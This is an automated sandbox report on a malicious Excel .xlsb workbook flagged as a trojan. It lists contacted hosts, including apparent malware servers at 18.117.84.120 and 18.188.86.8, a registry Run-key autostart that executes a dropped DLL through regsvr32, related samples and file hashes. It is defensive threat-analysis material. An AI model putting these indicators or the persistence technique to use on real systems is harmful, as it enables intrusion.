                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                      		high
                                      https://api.microsoftstream.com/api/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                        		high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                          		high
                                          https://cr.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                            		high
                                            https://portal.office.com/account/?ref=ClientMeControl2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                              		high
                                              https://ecs.office.com/config/v2/Office2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                		high
                                                https://graph.ppe.windows.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                  		high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://powerlift-frontdesk.acompli.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                    		high
                                                    https://officeci.azurewebsites.net/api/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                      		high
                                                      https://store.office.cn/addinstemplate2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://18.188.86.8/kenichi/special21new/trailer2a5regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                        		high
                                                        https://globaldisco.crm.dynamics.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                          		high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            		high
                                                            https://store.officeppe.com/addinstemplate2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://dev0-api.acompli.net/autodetect2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.odwebp.svc.ms2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://18.117.84.120/regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                              		high
                                                              https://web.microsoftstream.com/video/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                		high
                                                                https://graph.windows.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                  		high
                                                                  https://dataservice.o365filtering.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://officesetup.getmicrosoftkey.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://analysis.windows.net/powerbi/api2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                    		high
                                                                    https://prod-global-autodetect.acompli.net/autodetect2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://outlook.office365.com/autodiscover/autodiscover.json2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                      		high
                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                        		high
                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                          		high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                            		high
                                                                            https://ncus.contentsync.2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                              		high
                                                                              https://18.117.84.120/kenichi/special21new/trailer2a5T0regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://18.117.84.120/89bregsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                		high
                                                                                http://weather.service.msn.com/data.aspx2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                  		high
                                                                                  https://apis.live.net/v5.0/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                    		high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                      		high
                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                        		high
                                                                                        https://management.azure.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                          		high
                                                                                          https://18.188.86.8/Zregsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://wus2.contentsync.2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://incidents.diagnostics.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                            		high
                                                                                            https://clients.config.office.net/user/v1.0/ios2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                              		high
                                                                                              https://18.117.84.120/kenichi/special21new/trailer2a5regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmp, regsvr32.exe, 00000019.00000002.634483097.0000000000A9A000.00000004.00000020.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                		high
                                                                                                https://o365auditrealtimeingestion.manage.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                  		high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                    		high
                                                                                                    https://api.office.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                      		high
                                                                                                      https://incidents.diagnosticssdf.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                        		high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                          		high
                                                                                                          https://entitlement.diagnostics.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                            		high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                              		high
                                                                                                              https://outlook.office.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                		high
                                                                                                                https://storage.live.com/clientlogs/uploadlocation2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                  		high
                                                                                                                  https://templatelogging.office.com/client/log2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                    		high
                                                                                                                    https://outlook.office365.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                      		high
                                                                                                                      https://webshell.suite.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                        		high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                          		high
                                                                                                                          https://18.188.86.8:443/kenichi/special21new/trailer2a55regsvr32.exe, 00000019.00000002.636079030.0000000002A44000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://management.azure.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/common/oauth2/authorize2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                              		high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://graph.windows.net/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                		high
                                                                                                                                https://api.powerbi.com/beta/myorg/imports2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://devnull.onenote.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://ncus.pagecontentsync.2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://messaging.office.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://augloop.office.com/v22CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://skyapi.live.net/Activity/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown

                                                                                                                                              Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              8.8.7.7
                                                                                                                                              		unknownUnited States
                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                              107.180.50.232
                                                                                                                                              		tpfcu.comUnited States
                                                                                                                                              		26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                                                                                              18.117.84.120
                                                                                                                                              		unknownUnited States
                                                                                                                                              		3MIT-GATEWAYSUStrue

                                                                                                                                              Private

                                                                                                                                              IP
                                                                                                                                              192.168.2.1

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                              Analysis ID:431937
                                                                                                                                              Start date:09.06.2021
                                                                                                                                              Start time:15:20:54
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 8m 4s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Sample file name:Documents_13134976_1377491379.xlsb
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                              Number of analysed new started processes analysed:35
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.troj.expl.evad.winXLSB@28/13@1/4
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HDC Information:
                                                                                                                                              • Successful, ratio: 88.3% (good quality ratio 83.8%)
                                                                                                                                              • Quality average: 70.5%
                                                                                                                                              • Quality standard deviation: 29%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 70%
                                                                                                                                              • Number of executed functions: 70
                                                                                                                                              • Number of non-executed functions: 67
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found application associated with file extension: .xlsb
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Found warning dialog
                                                                                                                                              • Click Ok
                                                                                                                                              • Found warning dialog
                                                                                                                                              • Click Ok
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              Warnings:
                                                                                                                                              Show All
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 104.43.193.48, 92.122.145.220, 52.255.188.83, 52.109.76.68, 52.109.12.22, 20.82.210.154, 2.20.142.209, 2.20.142.210, 20.54.104.15, 20.54.7.98, 20.54.26.129, 92.122.213.194, 92.122.213.247, 184.30.20.56, 20.50.102.62
                                                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/431937/sample/Documents_13134976_1377491379.xlsb

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              15:22:03API Interceptor9x Sleep call for process: regsvr32.exe modified
                                                                                                                                              15:22:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSR C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
                                                                                                                                              15:22:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSR C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              18.117.84.120sample.ocxGet hashmaliciousBrowse

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                AS-26496-GO-DADDY-COM-LLCUS#U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                Payment receipt MT103.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                research-531942606.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 72.167.211.83
                                                                                                                                                research-121105165.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 72.167.211.83
                                                                                                                                                research-76934760.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 72.167.211.83
                                                                                                                                                research-1960540844.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 72.167.211.83
                                                                                                                                                research-1110827633.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 72.167.211.83
                                                                                                                                                DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 148.66.138.158
                                                                                                                                                New Order.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                DocumentScanCopy202_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 148.66.138.158
                                                                                                                                                NEW ORDER ZIP.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                qXDtb88hht.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                Telex_Payment.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                QyKNw7NioL.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                Payment_Advice.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                SOA #093732.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.62.195.83
                                                                                                                                                rHk5KU7bfT.exeGet hashmaliciousBrowse
                                                                                                                                                • 184.168.131.241
                                                                                                                                                MIT-GATEWAYSUSsample.ocxGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                PsNZLytUyV.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.34
                                                                                                                                                networkservice.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.20.124.79
                                                                                                                                                file.msg.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.30.52.76
                                                                                                                                                Update-KB1484-x86.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.30.52.79
                                                                                                                                                nT7K5GG5kmGet hashmaliciousBrowse
                                                                                                                                                • 19.35.22.33
                                                                                                                                                KnAY2OIPI3Get hashmaliciousBrowse
                                                                                                                                                • 19.252.51.218
                                                                                                                                                x86_unpackedGet hashmaliciousBrowse
                                                                                                                                                • 19.60.14.26
                                                                                                                                                rIbyGX66OpGet hashmaliciousBrowse
                                                                                                                                                • 19.21.98.61
                                                                                                                                                4JQil8gLKdGet hashmaliciousBrowse
                                                                                                                                                • 19.170.175.72
                                                                                                                                                IMG001.exeGet hashmaliciousBrowse
                                                                                                                                                • 19.241.222.80
                                                                                                                                                YPJ9DZYIpOGet hashmaliciousBrowse
                                                                                                                                                • 19.160.35.138
                                                                                                                                                FB11.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.34
                                                                                                                                                messg_02620000_deupx - Copy.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.39
                                                                                                                                                HUahIwV82u.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.34
                                                                                                                                                R8WWx5t2RE.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.41.89.186
                                                                                                                                                KCCAfipQl2.dllGet hashmaliciousBrowse
                                                                                                                                                • 19.3.169.121
                                                                                                                                                fOMSAB0Sfe.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.34
                                                                                                                                                530000.exeGet hashmaliciousBrowse
                                                                                                                                                • 128.31.0.34
                                                                                                                                                networkmanagerGet hashmaliciousBrowse
                                                                                                                                                • 19.211.36.11

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                8916410db85077a5460817142dcbc8desample.ocxGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                samp.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                UJFcKUqgmf.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                1c2102da_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                34d0a579_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                3f3cb269_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                fTXDq_9l7R2B0vcJRNsxuiqMxwPxzPi4LKezkpuCM_E.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                huqgk.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                publiclicense.vbsGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                Ei8IYTWG2j.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                IU7lKa778w.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                oi5zrjsKJG.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                SecuriteInfo.com.RiskTool.Win32.BitCoinMiner.vho.31244.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                b49zEBfIlL.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                SecuriteInfo.com.UDS.Trojan.Win32.Injuke.25486.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                XLhw6JGwC0.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                SecuriteInfo.com.UDS.Trojan.Win32.Bsymem.19574.dllGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                SecuriteInfo.com.Program.Win32.Wacapew.Cml.8809.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                ai8HRya7D6.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                SecuriteInfo.com.FileRepMalware.16835.exeGet hashmaliciousBrowse
                                                                                                                                                • 18.117.84.120
                                                                                                                                                37f463bf4616ecd445d4a1937da06e19audit-367497006.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                Bills Pending Approval.htmlGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                GDrVYvtzuO.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                9E7YOr0kp1.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                aKdhpWlFPg.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                vSYEHJjK1G.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                FaceCheck - Installer.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                analysis-31947858.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                Julie.randall Completed REFERRAL AGREEMENT 60926.htmlGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                DPSGNwkO1Z.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                x1Q123VhUa.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                Snc3sPQ2yl.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                nU8kVKVAc8.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                tmp_Client-Status-062021-952177.vbsGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                analysis-1593377733.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                research-531942606.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                New order_doc.exeGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                06.08.21 Inv & AP Statement - Copy.htmGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                #Ud83d#Udda8rocket.com 1208421(69-queue-2615.htmGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232
                                                                                                                                                research-121105165.xlsbGet hashmaliciousBrowse
                                                                                                                                                • 107.180.50.232

                                                                                                                                                Dropped Files

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                C:\Users\user\AppData\Local\Temp\L3YD7CE.dllsample.ocxGet hashmaliciousBrowse
                                                                                                                                                  C:\Users\user\iepfusn.dllsample.ocxGet hashmaliciousBrowse
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dllsample.ocxGet hashmaliciousBrowse

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                                                                                      File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60080
                                                                                                                                                      Entropy (8bit):7.995256720209506
                                                                                                                                                      Encrypted:true
                                                                                                                                                      SSDEEP:768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
                                                                                                                                                      MD5:6045BACCF49E1EBA0E674945311A06E6
                                                                                                                                                      SHA1:379C6234849EECEDE26FAD192C2EE59E0F0221CB
